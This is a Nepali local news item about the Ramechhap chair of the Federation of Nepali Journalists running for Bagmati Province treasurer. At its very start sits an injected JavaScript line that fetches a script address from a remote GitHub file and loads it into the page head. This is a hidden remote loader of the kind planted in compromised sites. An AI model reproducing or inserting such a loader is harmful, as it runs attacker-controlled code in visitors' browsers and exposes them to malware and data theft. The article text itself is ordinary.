;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चैत २०,
रामेछाप । नेपाल पत्रकार महासंघ रामेछापका हालका अध्यक्ष रमेश ढुङ्गेलले बागमती प्रदेशको कोषध्यक्षमा उम्मेद्वरी दिएका छन् ।
यही चैत २५ गते हुन गइरहेको पत्रकार महासंघको चुनावको लागि ढुङ्गेलले प्रदेशको कोषध्यक्ष पदको लागि उम्मेद्वरी दिएका हुन् । लामो समयदेखि पत्रकारिता पेशामा आबद्ध ढुङ्गेल जिल्लाबाटै संचालनमा रहेको अन्लाई मिडियामा आबद्ध रहेका छन् । त्यस्तै केन्द्रमा हिमालयन टेलिभिजना र आर्थिक अभियान पत्रिकामा आवद्ध रहेर काम गर्दै आएका छन् ।
उनले आफूलाई भोट दिएर कोषध्यक्ष पदमा विजयी गराउ प्रदेशका सबै पत्रकारहरुलाई आग्रह गरेका छन् ।
फेसबुक प्रतिक्रियाहरु